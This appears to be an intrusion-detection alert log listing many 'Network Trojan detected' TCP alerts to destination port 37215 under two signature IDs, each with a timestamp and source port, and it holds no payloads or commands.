                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.762956
                  SID:2829579
                  Source Port:43352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.664334
                  SID:2829579
                  Source Port:56594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.533118
                  SID:2835222
                  Source Port:47074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2835222
                  Source Port:52530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.968872
                  SID:2829579
                  Source Port:48746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499422
                  SID:2835222
                  Source Port:43086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.479791
                  SID:2835222
                  Source Port:54998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.818188
                  SID:2835222
                  Source Port:56386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.476661
                  SID:2835222
                  Source Port:42908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.755153
                  SID:2835222
                  Source Port:54544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.164122
                  SID:2829579
                  Source Port:44958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.968526
                  SID:2829579
                  Source Port:48250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000855
                  SID:2829579
                  Source Port:51572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.249834
                  SID:2829579
                  Source Port:53230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.923272
                  SID:2829579
                  Source Port:36566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974548
                  SID:2835222
                  Source Port:55544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.596695
                  SID:2829579
                  Source Port:56386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.865375
                  SID:2829579
                  Source Port:42666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.837566
                  SID:2829579
                  Source Port:35640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.649777
                  SID:2835222
                  Source Port:49174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.479148
                  SID:2829579
                  Source Port:58214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.837013
                  SID:2835222
                  Source Port:54302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.318563
                  SID:2829579
                  Source Port:46534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.638597
                  SID:2829579
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.596848
                  SID:2829579
                  Source Port:46504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.729684
                  SID:2835222
                  Source Port:42844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593421
                  SID:2835222
                  Source Port:46810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.538381
                  SID:2829579
                  Source Port:59760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423394
                  SID:2829579
                  Source Port:44240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366131
                  SID:2835222
                  Source Port:53516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251100
                  SID:2829579
                  Source Port:52964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.799492
                  SID:2829579
                  Source Port:41400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151855
                  SID:2835222
                  Source Port:43902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598078
                  SID:2829579
                  Source Port:35432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608013
                  SID:2835222
                  Source Port:41882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629936
                  SID:2829579
                  Source Port:55164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.645896
                  SID:2829579
                  Source Port:57242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041240
                  SID:2835222
                  Source Port:40250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.797142
                  SID:2835222
                  Source Port:51828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.812412
                  SID:2835222
                  Source Port:45966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.642327
                  SID:2835222
                  Source Port:49410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.919171
                  SID:2829579
                  Source Port:42770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000365
                  SID:2835222
                  Source Port:49898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.797297
                  SID:2835222
                  Source Port:48278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.666113
                  SID:2835222
                  Source Port:60562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.844972
                  SID:2829579
                  Source Port:57676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2829579
                  Source Port:56282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851714
                  SID:2835222
                  Source Port:55112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343143
                  SID:2835222
                  Source Port:38534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652788
                  SID:2829579
                  Source Port:46364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.835894
                  SID:2835222
                  Source Port:57332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322127
                  SID:2829579
                  Source Port:34182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.549884
                  SID:2835222
                  Source Port:37296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.966611
                  SID:2829579
                  Source Port:48256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994120
                  SID:2835222
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.772453
                  SID:2835222
                  Source Port:34042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833831
                  SID:2835222
                  Source Port:39644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449676
                  SID:2835222
                  Source Port:45792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.500109
                  SID:2829579
                  Source Port:34242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063010
                  SID:2835222
                  Source Port:54498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981356
                  SID:2835222
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864759
                  SID:2829579
                  Source Port:33528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593724
                  SID:2829579
                  Source Port:34426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.127145
                  SID:2829579
                  Source Port:55724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.460068
                  SID:2835222
                  Source Port:36444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.122406
                  SID:2835222
                  Source Port:57074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.262601
                  SID:2835222
                  Source Port:48834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2829579
                  Source Port:40198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526577
                  SID:2829579
                  Source Port:58792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.728877
                  SID:2829579
                  Source Port:51414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086358
                  SID:2829579
                  Source Port:42832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196325
                  SID:2835222
                  Source Port:42578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.418046
                  SID:2829579
                  Source Port:57380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.066193
                  SID:2829579
                  Source Port:49128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.263619
                  SID:2835222
                  Source Port:40930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.516345
                  SID:2835222
                  Source Port:47886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392064
                  SID:2835222
                  Source Port:57744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979400
                  SID:2835222
                  Source Port:45772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.765142
                  SID:2835222
                  Source Port:48108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.939147
                  SID:2829579
                  Source Port:47660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:58.519894
                  SID:2835222
                  Source Port:43512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155928
                  SID:2829579
                  Source Port:41590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.476399
                  SID:2829579
                  Source Port:59560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.061438
                  SID:2829579
                  Source Port:59354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.269822
                  SID:2835222
                  Source Port:60424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.772453
                  SID:2829579
                  Source Port:58568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.024313
                  SID:2835222
                  Source Port:33622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.567410
                  SID:2835222
                  Source Port:38606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.128878
                  SID:2829579
                  Source Port:45360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.245914
                  SID:2829579
                  Source Port:53820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.206516
                  SID:2835222
                  Source Port:52180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.941322
                  SID:2835222
                  Source Port:54670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659473
                  SID:2835222
                  Source Port:37270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.508048
                  SID:2829579
                  Source Port:40896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.033038
                  SID:2835222
                  Source Port:38918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.533087
                  SID:2829579
                  Source Port:43774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.776063
                  SID:2835222
                  Source Port:54390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.339417
                  SID:2835222
                  Source Port:43096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.763197
                  SID:2829579
                  Source Port:51162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646410
                  SID:2835222
                  Source Port:54972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587332
                  SID:2835222
                  Source Port:55542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.824956
                  SID:2835222
                  Source Port:40886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.741925
                  SID:2835222
                  Source Port:35432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.636807
                  SID:2829579
                  Source Port:41392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.639186
                  SID:2829579
                  Source Port:57408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.455887
                  SID:2835222
                  Source Port:59400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.359553
                  SID:2829579
                  Source Port:36254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814153
                  SID:2829579
                  Source Port:56282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.578531
                  SID:2829579
                  Source Port:40272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.749012
                  SID:2829579
                  Source Port:49886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.452279
                  SID:2829579
                  Source Port:58244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.840131
                  SID:2829579
                  Source Port:38858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163791
                  SID:2829579
                  Source Port:41472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135009
                  SID:2835222
                  Source Port:35722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.994829
                  SID:2835222
                  Source Port:35326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.904329
                  SID:2835222
                  Source Port:34990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2835222
                  Source Port:49326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.617070
                  SID:2829579
                  Source Port:40214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.610236
                  SID:2835222
                  Source Port:40510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598078
                  SID:2835222
                  Source Port:48240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.194226
                  SID:2835222
                  Source Port:36792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883376
                  SID:2829579
                  Source Port:59236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.919816
                  SID:2829579
                  Source Port:55002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.427359
                  SID:2829579
                  Source Port:54434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.874571
                  SID:2835222
                  Source Port:58798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.362168
                  SID:2835222
                  Source Port:54416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.899936
                  SID:2829579
                  Source Port:47162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.356515
                  SID:2835222
                  Source Port:42218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281764
                  SID:2829579
                  Source Port:47210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.567411
                  SID:2829579
                  Source Port:51124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.114427
                  SID:2835222
                  Source Port:50744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099427
                  SID:2835222
                  Source Port:35736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.980422
                  SID:2835222
                  Source Port:59388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.382964
                  SID:2829579
                  Source Port:59184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189458
                  SID:2829579
                  Source Port:42354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.759865
                  SID:2829579
                  Source Port:41030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2835222
                  Source Port:44662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.567410
                  SID:2835222
                  Source Port:44572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242902
                  SID:2835222
                  Source Port:57486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.405574
                  SID:2835222
                  Source Port:44174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.776043
                  SID:2835222
                  Source Port:35114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051851
                  SID:2829579
                  Source Port:56538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657452
                  SID:2829579
                  Source Port:55756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.959708
                  SID:2835222
                  Source Port:59724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.820955
                  SID:2829579
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819807
                  SID:2829579
                  Source Port:50988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.407750
                  SID:2829579
                  Source Port:54352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.879483
                  SID:2829579
                  Source Port:50208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.850693
                  SID:2829579
                  Source Port:48818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.752992
                  SID:2829579
                  Source Port:52904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.653833
                  SID:2835222
                  Source Port:53934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.292595
                  SID:2829579
                  Source Port:57538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.184507
                  SID:2829579
                  Source Port:53970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.402603
                  SID:2835222
                  Source Port:36074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.944051
                  SID:2835222
                  Source Port:39502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.130365
                  SID:2829579
                  Source Port:52112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.046169
                  SID:2835222
                  Source Port:57006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.287324
                  SID:2835222
                  Source Port:49762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.172720
                  SID:2829579
                  Source Port:47462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.223907
                  SID:2829579
                  Source Port:36074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.753461
                  SID:2835222
                  Source Port:46698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.126815
                  SID:2829579
                  Source Port:56350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.956245
                  SID:2829579
                  Source Port:52866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151266
                  SID:2829579
                  Source Port:38060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868387
                  SID:2835222
                  Source Port:60028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.532653
                  SID:2835222
                  Source Port:40450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.592095
                  SID:2829579
                  Source Port:59496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905585
                  SID:2829579
                  Source Port:49914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875738
                  SID:2835222
                  Source Port:51306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.556731
                  SID:2835222
                  Source Port:56472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.574442
                  SID:2829579
                  Source Port:47418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084345
                  SID:2835222
                  Source Port:50872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488063
                  SID:2829579
                  Source Port:37746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090625
                  SID:2835222
                  Source Port:54810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202392
                  SID:2835222
                  Source Port:52058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.712804
                  SID:2829579
                  Source Port:58572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.584136
                  SID:2835222
                  Source Port:45632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527287
                  SID:2829579
                  Source Port:52750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.065687
                  SID:2835222
                  Source Port:54308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218292
                  SID:2835222
                  Source Port:58162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022407
                  SID:2829579
                  Source Port:38044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.568702
                  SID:2835222
                  Source Port:39256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.862875
                  SID:2835222
                  Source Port:37682
                  Destination Port:37215
